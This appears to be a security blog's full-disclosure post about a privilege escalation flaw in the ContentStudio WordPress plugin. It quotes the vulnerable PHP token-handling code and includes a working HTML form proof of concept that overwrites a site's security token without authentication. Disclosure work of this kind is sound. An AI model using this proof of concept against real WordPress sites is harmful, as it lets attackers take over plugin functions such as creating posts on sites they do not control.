As discussed in a separate post, it looks like a hacker was probing for the WordPress plugin ContentStudio over the weekend. In looking over the plugin, we found that it is very insecure and contains a privilege escalation vulnerability.

In the file /contentstudio-plugin.php the plugin registers the function cstu_set_token() to run whenever WordPress loads:

120

add_action('init', [$this, 'cstu_set_token']);

That function doesn’t do any security checks before setting a new value for a security token used by the plugin:

506
507
508
509
510
511
512
513

public function cstu_set_token()
{
	try {
		if (isset($_REQUEST['cstu_set_token']) && isset($_REQUEST['token'])) {
			/*$valid = get_option('contentstudio_token');
			if (!$valid) {*/
			sanitize_text_field($_REQUEST['token']);
			update_option('contentstudio_token', $_REQUEST['token']);

In the same file, the plugin registers other function to be accessed the same way, one of those is cstu_create_new_post():

123

add_action('init', [$this, 'cstu_create_new_post']);

The comment for that function says “Create a new WordPress post, action is called from the REMOTE ContentStudio Server.”

The only security check before allowing that is a check if a valid security token is provided:

749
750
751
752
753
754
755
756

public function cstu_create_new_post()
{
	if (isset($_REQUEST) && isset($_REQUEST['cstu_create_new_post']) && isset($_REQUEST['token'])) {
 
		// validate the token
 
		$valid = $this->do_validate_cstu_token($_REQUEST['token']);
		if ($valid) {

454
455
456
457
458
459

public function do_validate_cstu_token($token)
{
	$token = sanitize_text_field($token);
	if (get_option('contentstudio_token') == $token) {
		return true;
	}

As anyone can set the value for the security token, they can access that functionality, as well as other functionality in the plugin.

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof of concept will set the security token value to “proofofconcept”.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/?cstu_set_token=true" method="POST">
<input type="hidden" name="token" value="proofofconcept" />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?